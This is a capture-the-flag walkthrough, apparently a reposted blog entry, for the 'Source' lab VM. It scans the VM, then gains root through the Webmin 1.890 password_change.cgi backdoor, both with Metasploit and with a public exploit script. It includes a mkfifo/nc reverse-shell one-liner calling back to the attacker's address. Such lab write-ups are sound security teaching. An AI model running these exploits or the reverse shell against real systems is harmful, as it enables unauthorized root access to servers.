Source
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ sudo netdiscover -i eth1 -r 10.1.1.0/24
Currently scanning: 10.1.1.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.153 00:0c:29:ba:e7:46 1 60 VMware, Inc.
10.1.1.254 00:50:56:ee:68:5e 1 60 VMware, Inc.
Kali's netdiscover identifies the target as 10.1.1.153: the 00:0c:29 OUI is the one VMware assigns to guest VMs, while 10.1.1.1 and 10.1.1.254 (00:50:56 OUI) are VMware's own host-side virtual interfaces, not targets.
Nmap scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ sudo nmap -sS -sV -sC -p- 10.1.1.153 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-10 22:36 EST
Nmap scan report for bogon (10.1.1.153)
Host is up (0.0013s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b74cd0bde27b1b15722764562915ea23 (RSA)
| 256 b78523114f44fa22008e40775ecf287c (ECDSA)
|_ 256 a9fe4b82bf893459365becdac2d395ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 00:0C:29:BA:E7:46 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.56 seconds
The Nmap scan shows two open ports: 22 (OpenSSH 7.6p1 on Ubuntu) and 10000 (Webmin, served by its built-in MiniServ web server, version 1.890). The exact Webmin version is the finding to hold on to.
Getting a shell
Browsing to port 10000 redirects to HTTPS and lands on Webmin's login page.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ curl -k https://10.1.1.153:10000/robots.txt
User-agent: *
Disallow: /
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ searchsploit MiniServ
Exploits: No Results
Shellcodes: No Results
searchsploit finds nothing for the string "MiniServ", but that is only the name of Webmin's embedded web server; the product to search for is Webmin itself.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source]
└─$ nikto -h https://10.1.1.153:10000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.153
+ Target Hostname: 10.1.1.153
+ Target Port: 10000
---------------------------------------------------------------------------
+ SSL Info: Subject: /O=Webmin Webserver on source/CN=*/emailAddress=root@source
Ciphers: TLS_AES_256_GCM_SHA384
Issuer: /O=Webmin Webserver on source/CN=*/emailAddress=root@source
+ Start Time: 2023-03-10 22:40:36 (GMT-5)
---------------------------------------------------------------------------
+ Server: MiniServ/1.890
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'auth-type' found, with contents: auth-required=1
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie redirect created without the secure flag
+ Cookie redirect created without the httponly flag
+ Cookie testing created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server is using a wildcard certificate: *
+ Hostname '10.1.1.153' does not match certificate's names: *
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ MiniServ - This is the Webmin Unix administrator. It should not be running unless required.
+ OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
+ /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
+ OSVDB-3092: /css/: This might be interesting...
The WASD, SIPS and Cisco ACS entries Nikto lists are false positives (it warned above that the server answers junk HTTP methods); the useful findings are the Server: MiniServ/1.890 banner and the auth-type header. Trying a few SQL-injection strings in the login form to bypass authentication gets nowhere: Webmin blocks a client address after a handful of failed logins, so after a few attempts it returns:
Error - Access denied for 10.1.1.143. The host has been blocked because of too many authentication failures.
msf6 > search webmin
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
2 exploit/linux/http/webmin_file_manager_rce 2022-02-26 excellent Yes Webmin File Manager RCE
3 exploit/linux/http/webmin_package_updates_rce 2022-07-26 excellent Yes Webmin Package Updates RCE
4 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
5 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
6 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
7 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
Interact with a module by name or index. For example info 7, use 7 or use exploit/linux/http/webmin_backdoor
msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_backdoor) > show options
Module options (exploit/linux/http/webmin_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 10000 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Webmin
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/webmin_backdoor) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_backdoor) > set LHOST 10.1.1.143
LHOST => 10.1.1.143
msf6 exploit(linux/http/webmin_backdoor) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/webmin_backdoor) > set SRVHOST 10.1.1.143
SRVHOST => 10.1.1.143
msf6 exploit(linux/http/webmin_backdoor) > set RHOSTS 10.1.1.153
RHOSTS => 10.1.1.153
msf6 exploit(linux/http/webmin_backdoor) > run
[*] Started reverse TCP handler on 10.1.1.143:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.1.1.143:5555 -> 10.1.1.153:60834) at 2023-03-11 03:35:16 -0500
id
uid=0(root) gid=0(root) groups=0(root)
This is a root shell. It is a bare reverse shell with no tty (each command is echoed back before its output), but changing directory works fine:
root@source:/usr/share/webmin/# cd /root
cd /root
root@source:~# ls -alh
ls -alh
total 36K
drwx------ 5 root root 4.0K Jun 26 2020 .
drwxr-xr-x 24 root root 4.0K Jun 26 2020 ..
-rw------- 1 root root 44 Jun 26 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Jun 26 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Jun 26 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Jun 26 2020 .ssh
-rw-r--r-- 1 root root 25 Jun 26 2020 root.txt
root@source:~# cat root.txt
cat root.txt
THM{UPDATE_YOUR_INSTALL}
root@source:~#
Getting a shell manually
Searching the web for an exploit for MiniServ 1.890 turns up:
https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 id
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
uid=0(root) gid=0(root) groups=0(root)
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
The command ran as root and its output came back embedded in Webmin's error page. The trailing curl error 56 ("unexpected eof while reading") only means miniserv closed the TLS connection without sending a close_notify; the response had already arrived, so it can be ignored.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 which nc
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 'which nc'
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen.
/bin/nc
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
The command must be passed as a single quoted argument, since the script only takes one command string. Next, try to turn this into a shell.
But every reverse-shell one-liner tried this way failed:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Source/WebMin-1.890-Exploit-unauthorized-RCE-master]
└─$ python exploit.py 10.1.1.153 10000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.1.143 5555 >/tmp/f"
--------------------------------
______________ _____ __
/ ___/_ __/ | / _/ | / /
\__ \ / / / /| | / // |/ /
___/ // / / ___ |_/ // /| /
/____//_/ /_/ |_/___/_/ |_/
--------------------------------
WebMin 1.890-expired-remote-root
<h1>Error - Perl execution failed</h1>
<p>Your password has expired, and a new one must be chosen. at /usr/share/webmin/password_change.cgi line 12.
</p>
curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0
From: https://www.cnblogs.com/jason-huawen/p/17206486.html